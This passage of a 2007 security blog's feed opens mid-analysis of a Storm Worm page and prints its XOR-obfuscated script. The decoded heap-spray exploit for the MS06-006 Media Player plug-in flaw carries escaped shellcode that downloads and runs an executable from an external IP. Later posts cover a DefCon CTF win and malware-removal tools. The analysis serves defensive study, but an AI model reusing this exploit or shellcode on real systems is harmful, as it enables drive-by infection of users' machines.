be\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xd2\xd2\xd2\xd2\xd1\xd1\xd1\xd1\xd0\xd0\xd0\xd0\xd7\xd7\xd7\xd7\xd6\xd6\xd6\xd6\xd5\xd5\xd5\xd5\xd4\xd4\xd4\xd4\xdb\xdb\xdb\xdb\xda\xda\xda\xda\xd9\xd9\xd9\xd9\xd8\xd8\xd8\xd8\xdf\xdf\xdf\xdf\xd2\xd2\xd2\x96\xdd\xdd\xdd\xdd\xdc\xdc\xdc\xdc\xd2\xd2\xd2\x96\xc2\xc2\xc2\xc2\xc1\xc1\xc1\xc1\xc0\xc0\xc0\xc0\xc7\xc7\xc7\xc7\xc6\xc6\xc6\xc6\xc5\xc5\xc5\xc5\xc4\xc4\xc4\xc4\xcb\xcb\xcb\xcb\xca\xca\xca\xca\xc9\xc9\xc9\xc9\xa3\xa3\xa3\xa3\xa2\xa2\xa2\xa2\xa1\xa1\xa1\xa1\xa0\xa0\xa0\xa0\xa7\xa7\xa7\xa7\xa6\xa6\xa6\xa6\xa5\xa5\xa5\xa5\xa4\xa4\xa4\xa4\xab\xab\xab\xab\xaa\xaa\xaa\xaa\xbd\xe4\xfe\xe5\xb1\xad\xaf\xbc\xd6\xde\xd1\xd6\xd7\xad\xaf\xbc\xd1\xdc\xd7\xca\xad\xaf\xbc\xdb\xc7\xde\xdf\xad\xb3";&lt;br /&gt;&lt;br /&gt;var xored_str = xor_str(plain_str, 147);&lt;br /&gt;&lt;br /&gt;document.write(xored_str);&lt;br /&gt;&amp;lt;/script&amp;gt;&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;Which gets decoded as:&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;&amp;lt;SCRIPT&amp;gt;&lt;br /&gt;var s=unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");&lt;br /&gt;do{s+=s;}while(s.length&amp;lt;0x0900000);&lt;br /&gt;s+=unescape("%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u382F%u2E39%u3334%u312E%u3639%u352E%u662F%u6C69%u2E65%u6870%u0070");&lt;br /&gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;&amp;lt;/HEAD&amp;gt;&lt;br /&gt;&amp;lt;BODY&amp;gt;&lt;br /&gt;&amp;lt;EMBED SRC="----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLAAANNNNOOOOAAAQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ0000111122223333444455556666777788889999.wmv"&amp;gt;&lt;br /&gt;&amp;lt;/EMBED&amp;gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;In that last bit, the variable "s" starts with "AAAAAAAA". Then, the do/while loop takes the "s" variable and adds itself to itself 9,437,184 times (0x0900000). After you get 75,497,472 "A"s, it adds shellcode to the end. Redirecting the shellcode to a file and running the file command on it returns "/tmp/js1.sploit: MS-DOS executable (COM)".&lt;br /&gt;&lt;br /&gt;The final part of the decoded page might look familiar....if not, check out &lt;a href="http://www.securiteam.com/exploits/5KP0H2KHPQ.html"&gt;Windows Media Player Plug-in for Non-Microsoft Browsers Code Execution (MS06-006) - Exploit II&lt;/a&gt;.</content><link rel='alternate' type='text/html' href='http://www.johnhsawyer.com/2007/08/storm-worm-just-keeps-rolling-with.html' title='The Ever Changing Storm'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=12227024&amp;postID=139126488597205031' title='0 Comments'/><link rel='replies' type='application/atom+xml' href='http://www.johnhsawyer.com/atom.xml' title='Post Comments'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/139126488597205031'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/139126488597205031'/><author><name>John H. Sawyer</name><uri>http://www.blogger.com/profile/07459314688135865938</uri><email>noreply@blogger.com</email></author></entry><entry><id>tag:blogger.com,1999:blog-12227024.post-4681565402873310067</id><published>2007-08-09T19:56:00.000-04:00</published><updated>2007-08-09T20:10:17.368-04:00</updated><title type='text'>the H@cker Elite: UF engineers compete in Vegas</title><content type='html'>Folks around work get really stoked about our team winning which is cool. It's nice to be in the limelight but I find the need to keep reminding people that it wasn't just psifertex or myself that won CTF. It was a team effort and we couldn't have done it without having the right make up of people, personalities and technical skills.&lt;br /&gt;&lt;br /&gt;I think that April Dudash from the Alligator did a wonderful job (&lt;a href="http://www.alligator.org/pt2/070809defcon.php"&gt;article&lt;/a&gt;) capturing that sentiment. Thank you, April.&lt;br /&gt;&lt;br /&gt;And, thank you, team &lt;a href="http://www.flickr.com/photo_zoom.gne?id=1043905143&amp;size=l&amp;amp;context=set-72157601280791450"&gt;1@stplace&lt;/a&gt; and @tlas. Every one of you is incredible and I'm thankful to walk amongst you.</content><link rel='alternate' type='text/html' href='http://www.johnhsawyer.com/2007/08/hcker-elite-uf-engineers-compete-in.html' title='the H@cker Elite: UF engineers compete in Vegas'/><link rel='related' href='http://www.alligator.org/pt2/070809defcon.php' title='the H@cker Elite: UF engineers compete in Vegas'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=12227024&amp;postID=4681565402873310067' title='0 Comments'/><link rel='replies' type='application/atom+xml' href='http://www.johnhsawyer.com/atom.xml' title='Post Comments'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/4681565402873310067'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/4681565402873310067'/><author><name>John H. Sawyer</name><uri>http://www.blogger.com/profile/07459314688135865938</uri><email>noreply@blogger.com</email></author></entry><entry><id>tag:blogger.com,1999:blog-12227024.post-5471125591640243906</id><published>2007-08-05T22:46:00.000-04:00</published><updated>2007-08-07T15:46:30.364-04:00</updated><title type='text'>1@stplace wins DefCon CTF 2 yrs in a row</title><content type='html'>After 24 hrs of competition over 3 days in Vegas, team &lt;a href="http://nopsr.us/"&gt;1@stplace&lt;/a&gt; took first place in the &lt;a href="http://www.defcon.org/"&gt;DefCon&lt;/a&gt; Capture the Flag contest hosted by &lt;a href="http://www.kenshoto.com/"&gt;Kenshoto&lt;/a&gt;. Headed up by team captain &lt;a href="http://atlas.r4780y.com/cgi-bin/atlas"&gt;@tlas&lt;/a&gt; and co-captain Doc Brown (aka drb), we sifted our way through the maze of brilliant confusion weaved together by the Kenshoto guys. They are truly an amazing bunch of dedicated hackers who design the CTF challenges to take their fellow and aspiring hackers to the next level.&lt;br /&gt;&lt;br /&gt;I am blessed to have been able to compete again with the talented 1@stplace team composed of @tlas, Doc Brown, fury, jrod, plato, &lt;a href="http://www.wantingseed.com/"&gt;psifertex&lt;/a&gt;, shiruken, wrffr and myself (mezzendo). @tlas provided great leadership throughout the time leading up to CTF and during the entire weekend. Teamwork, friendship and communication were key to our win.&lt;br /&gt;&lt;br /&gt;Thank you @tlas for believing in me and picking me to be a part of this awesome experience two years in a row.</content><link rel='alternate' type='text/html' href='http://www.johnhsawyer.com/2007/08/1stplace-wins-defcon-ctf-2-yrs-in-row.html' title='1@stplace wins DefCon CTF 2 yrs in a row'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=12227024&amp;postID=5471125591640243906' title='3 Comments'/><link rel='replies' type='application/atom+xml' href='http://www.johnhsawyer.com/atom.xml' title='Post Comments'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/5471125591640243906'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/5471125591640243906'/><author><name>John H. Sawyer</name><uri>http://www.blogger.com/profile/07459314688135865938</uri><email>noreply@blogger.com</email></author></entry><entry><id>tag:blogger.com,1999:blog-12227024.post-7078037045531476716</id><published>2007-07-30T20:07:00.000-04:00</published><updated>2007-07-30T22:48:08.893-04:00</updated><title type='text'>Evil Bits: Fighting Forensics</title><content type='html'>As if freelance writing with things now appearing in both Network Computing and Information Week magazines weren't keeping me busy enough, I'm now a blogger with &lt;a href="http://www.darkreading.com/"&gt;DarkReading.com&lt;/a&gt;. My blog is titled "Evil Bits" and the first post is now available, "&lt;a href="http://www.darkreading.com/blog.asp?blog_sectionid=447"&gt;Fighting Forensics&lt;/a&gt;." It covers some of the current news surrounding antiforensics being released at Black Hat this week, a little history about this area of research and links to previous presentations from Black Hat. Chew up a red pill and take a &lt;a href="http://www.darkreading.com/blog.asp?blog_sectionid=447"&gt;read...&lt;/a&gt;</content><link rel='alternate' type='text/html' href='http://www.johnhsawyer.com/2007/07/evil-bits-fighting-forensics.html' title='Evil Bits: Fighting Forensics'/><link rel='related' href='http://www.darkreading.com/blog.asp?blog_sectionid=447' title='Evil Bits: Fighting Forensics'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=12227024&amp;postID=7078037045531476716' title='0 Comments'/><link rel='replies' type='application/atom+xml' href='http://www.johnhsawyer.com/atom.xml' title='Post Comments'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/7078037045531476716'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/7078037045531476716'/><author><name>John H. Sawyer</name><uri>http://www.blogger.com/profile/07459314688135865938</uri><email>noreply@blogger.com</email></author></entry><entry><id>tag:blogger.com,1999:blog-12227024.post-555437252060980770</id><published>2007-07-23T12:11:00.000-04:00</published><updated>2007-07-23T12:21:40.988-04:00</updated><title type='text'>Microsoft Malware Removal Starter Kit</title><content type='html'>I came across this &lt;a href="http://www.microsoft.com/technet/security/guidance/disasterrecovery/malware/default.mspx"&gt;"Microsoft Malware Removal Starter Kit"&lt;/a&gt; Friday evening. I don' remember where I saw it, now, but it was released on July 10 and didn't get any recognition in any of the blogs that I frequent.&lt;br /&gt;&lt;br /&gt;Basically, they've put together instructions for what I had created while at a previous position here at UF. The HelpDesk for our dept needed a way to do offline scanning and no one was capable of using a Linux Live boot CD to run ClavAV, so I created a disk with &lt;a href="http://www.nu2.nu/pebuilder/"&gt;BartPE&lt;/a&gt; and included several useful tools such as a registry editor and CLI version of McAfee VirusScan.&lt;br /&gt;&lt;br /&gt;While BartPE bordered on being a violation of MS' EULA, it never became a target of MS for a takedown. It's interesting that MS has now decided to leverage their WinPE for doing malware removal. Sure, they leave it up to the user to create the disk and add the tools, but they have a brain dead guide on how to do it. Maybe someone at MS said, "Hey, we use this WinPE thingie for creating images for deploying via WDS and installing Windows. I bet we could add more tools and make it even more useful." Well, they probably didn't say that, but I'm glad they didn't say something like, "How can we charge for this!"</content><link rel='alternate' type='text/html' href='http://www.johnhsawyer.com/2007/07/microsoft-malware-removal-starter-kit.html' title='Microsoft Malware Removal Starter Kit'/><link rel='related' href='http://www.microsoft.com/technet/security/guidance/disasterrecovery/malware/default.mspx' title='Microsoft Malware Removal Starter Kit'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=12227024&amp;postID=555437252060980770' title='0 Comments'/><link rel='replies' type='application/atom+xml' href='http://www.johnhsawyer.com/atom.xml' title='Post Comments'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/555437252060980770'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/555437252060980770'/><author><name>John H. Sawyer</name><uri>http://www.blogger.com/profile/07459314688135865938</uri><email>noreply@blogger.com</email></author></entry></feed>